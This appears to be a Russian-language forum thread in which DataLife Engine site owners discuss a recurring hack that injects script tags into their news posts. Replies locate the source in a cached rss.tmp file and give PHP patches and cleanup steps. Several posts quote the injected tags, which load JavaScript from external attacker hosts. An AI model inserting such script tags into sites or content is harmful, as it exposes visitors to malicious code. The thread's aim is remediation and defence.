Хостинг . Взломали сайт

Ребята помогите кто разбирается, у меня сайт на Data Life Engine сделан и все время кто-то в новостях прописывает в начале и в конце вот такой код, тех поддержка у нас не работает, восстановить mysql тоже (нету в списке новой базы).

Вот тот скрипт что он приписывает:

<script src="http://zheenix.msk.ru/a043bb882dd6b02d4a8a0074123bfeaa.js" type="text/javascript"></script><script src="http://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"></script>

он еще издевается! ...

Вот форум по этой теме (http://talk.prowebber.ru/index.php?showtopic=3990&pid=34123&st=0), я искал вредоносный код по которому он прописывает в новостях эту фигню, но ничего не нашел.

Кто разбирается помогите.

может попробовать методы описаны тут bestwebber.ru/hacks/72-zashhita-dle-sajta-ot-vzloma.html открыть доступ к админ панелям только моему ip, или это не поможет?

Обнови Data Life Engine...може профіксили баг.
або поміняй CMS.

да это и хочу сделать

да) вроде все удачно прошло ) надеюсь в новой бэкдоров нету.

тоже самое у меня щас - (выгребаю 2 день - новостей слишком много). а код сидит тут /www/engine/cache/rss.tmp (удалите rss.tmp и код перестанет появляться в новостях Но прийдется это все <script src="http://zheenix.msk.ru/a043bb882dd6b02d4a8a0074123bfeaa.js" type="text/javascript"></script><script src="http://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"></script> удалять вручную с каждой новости ) файл rss.tmp сам востановится.

Вначале можно обезвредить вредоносный код с помощью функции Поиск и замена, которая есть в админпанели движка DLE. Просто меняем zheenix.msk.ru на пробел. Теперь скрипт не работает. Оставшиеся хвостики типа "/a043bb882dd6b02d4a8a0074123bfeaa.js" особого вреда, наверное, не представляют.
Но, чтобы больше эта проблема не возникала нужно подлатать дыры в движке. Инструкции ниже:



Для исправления откройте файл engine/inc/files.php и найдите:
$serverfile = trim( htmlspecialchars( strip_tags( $_POST['serverfile'] ) ) );


замените на:
if ($member_id['user_group'] == 1) $serverfile = trim( htmlspecialchars( strip_tags( $_POST['serverfile'] ) ) ); else $serverfile = '';

if ( $serverfile != '' ) {

$serverfile = str_replace( "\\", "/", $serverfile );
$serverfile = str_replace( "..", "", $serverfile );
$serverfile = str_replace( "/", "", $serverfile );
$serverfile_arr = explode( ".", $serverfile );
$type = totranslit( end( $serverfile_arr ) );
$curr_key = key( $serverfile_arr );
unset( $serverfile_arr[$curr_key] );

if ( in_array( strtolower( $type ), $allowed_files ) )
$serverfile = totranslit( implode( ".", $serverfile_arr ) ) . "." . $type;
else $serverfile = '';

}

if( $serverfile == ".htaccess") die("Hacking attempt!");


Откройте файл engine/classes/thumb.class.php и найдите:
$this->img['des'] = imagecreatetruecolor( $this->img['lebar_thumb'], $this->img['tinggi_thumb'] );


и добавьте выше:
if ($this->img['lebar_thumb'] < 1 ) $this->img['lebar_thumb'] = 1;
if ($this->img['tinggi_thumb'] < 1 ) $this->img['tinggi_thumb'] = 1;




Откройте файлы engine/modules/search.php и engine/modules/fullsearch.php и найдите:
$count_result = 0;

ниже добавьте:
$sql_count = "";

Откройте файл engine/inc/templates.php и найдите:
$allow_save = false;

ниже добавьте:
$_REQUEST['do_template'] = trim( totranslit($_REQUEST['do_template'], false, false) );
$_REQUEST['do_language'] = trim( totranslit($_REQUEST['do_language'], false, false) );

Забыл написать, что с остальными адресами вредителя нужно поступить также, как с zheenix.msk.ru. То есть you-stupped-lox.ucoz.ru тоже заменяем на пробел.

Вначале можно обезвредить вредоносный код с помощью функции Поиск и замена, которая есть в админпанели движка DLE. Просто меняем <a href="http://zheenix.msk.ru" target="_blank" rel="nofollow">http://zheenix.msk.ru</a> на пробел. Теперь скрипт не работает.


А не проще эти файлы удалить, а не ставить пробелы ( как у меня получилось код обезвредить - читайте выше )

Но, чтобы больше эта проблема не возникала нужно подлатать дыры в движке. Инструкции ниже:


Для какой версии ДЛЕ эти инструкции ???

Удалить файлы не получится, так как они находятся НЕ на вашем сервере, а подгружается со стороны :) А так данная операция заняла 1,5 минуты.
Удаление файла rss.tmp не решит проблему уже "инфицированных" публикаций. Чистить руками целесообразно, если база новостей небольшая. А если 20 000 новостей, как у меня, то умом тронешься..
Инструкции в принципе для всех версий DLE. Просто в более новых, например в девятой, эти дыры уже закрыты. В некоторых одни закрыты, другие нет. Тут смотрите сами. А совсем старых вообще нужно выполнить каждый из этих шагов. Данные меры обезопасят сайт в будущем от подобных неприятностей.
Также можно предпринять дополнительные меры предосторожности: seo-doc.ru/defence/defence-dle/44-zashhita-dle-ot-vzloma.html

Удалить файлы не получится, так как они находятся НЕ на вашем сервере, а подгружается со стороны :)

Наверное Вы меня не поняли
Они были связаны с rss.tmp ( т.е удаляеш это <script src="zheenix.msk.ru/5237bfba6fad3b68ac7cb25aa38ed330.js" type="text/javascript"></script><script src="ivan81.ucoz.ru/engine.js" type="text/javascript"></script> на этом месте вылазит это <script src="you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"></script><script src="www.karbrrbrr.co.cc/16d70455cdee14e9500a819485db36af.js" type="text/javascript"></script> и так до 10 разных адресов ( на большее мне терпения не хватило экспереминтировать ) а вот когда вычислил что файл rss.tmp является источником ( взял его и удалил по FTP с сервера ) то все эти адреса перестали появлятся. НО теперь приходиться вручную чистить новости. Кстати у меня версия 9.0 и тоже заплатки на дыры ставил - как видно непомогло.

Удаление файла rss.tmp не решит проблему уже "инфицированных" публикаций.

Те что успели новости заразится ( а заражаются они сразу все ) после удаления rss.tmp - БОЛЬШЕ НОВЫЕ АДРЕСА НЕ ПОЯВЛЯЮТСЯ в новостях

Чистить руками целесообразно, если база новостей небольшая. А если 20 000 новостей, как у меня, то умом тронешься..

Я еще не тронулся =). Если дорожите своими посетителями - то прийдется чистить новости руками ( я уже лишился 2-3К людей за время которое этот скрипт работал - на данный момент больше половины базы новостей почистил и люди стали опять появлятся )

На этом разрешите откланятся - а то тема становится бесполезным спором (флудом).

Я описал свой способ обезвреживания - который у меня нормально сработал.

я просто новую версию накатал ) и восстановил mysql ) новости еще не все почистил )

снова взломали сайт <script src="goooogle.ipq.co/a2b07526ddd1fda7b48ead676c5a11b4.js" type="text/javascript"></script>

только пару дней назад новый сайт установил...

Володя

а где этот зараженный файл?

снова взломали сайт <script src="<a href="http://goooogle.ipq.co/a2b07526ddd1fda7b48ead676c5a11b4.js"" target="_blank" rel="nofollow">http://goooogle.ipq.co/a2b07526ddd1fda7b48ead676c5a11b4.js"</a> type="text/javascript"></script>

Тоже самое (только почистил) - поставил 8.3 (была 9.0) посмотрим что утром будет (появятся новые адреса или нет)

вот нашел инфу об этом http://talk.prowebber.ru/index.php?showtopic=3990

Удали на..й это DLE!!!

Видали всі файли... постав з нуля CMS і не став старий шаблон!

P.S.: в мене ніколи просто такого не було

Слушай если я сейчас начну качать твои конфиги посмотрим что с этого получится.Просто в Joomla качаются пустыми.И ты сам написал что тебя ломали много раз - так зачем это тебе нужно?

Права поставь на конфиги другие.Все будет работать,я одному пацеку так вопще права не менял и у него все работало.

Когда все почистите, не забудьте сменить все пароли FTP. А также проверьте версию своего антивируса. Возможно скрипт прописывают с Вашего же компа.
Удачи.

Вот что еще нашел по этой теме - dle.net.ua/bagfixs/5817-ocherednaya-dyrka-na-dle.html